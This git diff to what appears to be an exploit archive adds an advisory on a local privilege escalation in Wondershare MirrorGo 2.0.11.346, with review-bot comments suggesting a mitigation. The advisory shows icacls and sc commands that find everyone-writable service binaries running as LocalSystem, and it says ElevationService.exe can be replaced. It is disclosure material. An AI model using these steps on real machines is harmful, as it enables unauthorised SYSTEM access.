diff --git a/exploits/windows/local/50130.py b/exploits/windows/local/50130.py index 8d23c7d42..49b14b61a 100755 --- a/exploits/windows/local/50130.py +++ b/exploits/windows/local/50130.py @@ -21,7 +21,7 @@ characters = { 'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j', '906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o', '7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t', -'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z'} +'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','!':'B398'} # ASCII art is important xD banner = ''' diff --git a/exploits/windows/local/50787.txt b/exploits/windows/local/50787.txt new file mode 100644 index 000000000..4cbce2d12 --- /dev/null +++ b/exploits/windows/local/50787.txt 
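Review bot: The entry added to `characters` is inverted relative to the rest of the table. Every existing pair maps a four-hex-digit code to a character (for example `'E4BC':'z'`), but the new one is written `'!':'B398'`, so a lookup keyed by code will not find `B398`. If the intent is to extend the table with `!`, the pair should read `'B398':'!'`. The dict opens before the hunk and the code that consumes it is not shown, so how a missing key is handled cannot be confirmed from here.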
@@ -0,0 +1,47 @@
+# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
+# Discovery by: Luis Martinez
+# Discovery Date: 2022-02-23
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link : https://download.wondershare.com/mirror_go_full8050.exe
+# Tested Version: 2.0.11.346
+# Vulnerability Type: Local Privilege Escalation
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Privilege Escalation:
+
+# Insecure folders permissions issue:
+
+C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe"
+
+
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F)
+C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F)
+
+# Service info:
+
+C:\>sc qc ElevationService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ElevationService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Wondershare Driver Install Service help
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+
+A vulnerability was found in Wondershare MirrorGo 2.0.11.346.
The Wondershare MirrorGo executable
+"ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it
+with a malicious file that will be executed with "LocalSystem" privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9336d3ff4..6a7a2374b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11453,6 +11453,7 @@ id,file,description,date,author,type,platform,port
 50765,exploits/windows/local/50765.txt,"HMA VPN 5.3 - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",1970-01-01,ibby,local,hardware,
 50776,exploits/windows/local/50776.txt,"Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path",1970-01-01,"Johto Robbie",local,windows,
+50787,exploits/windows/local/50787.txt,"Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions",1970-01-01,"Luis Martínez",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
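Review bot: The write-up added as 50787.txt ends at the finding and gives no remediation or verification step. The `(I)` flag on every `Everyone:(I)(F)` line of the icacls output marks the full-control entry as inherited from the parent folder, so the closing paragraph understates the scope by naming only "ElevationService.exe". Every listed binary carries the same entry, and the correction belongs on the install directory's ACL. I would add a final section such as `# Mitigation: remove the inherited Everyone:(F) entry from the install directory and re-run the icacls check above to confirm no service binary is writable by non-administrators.`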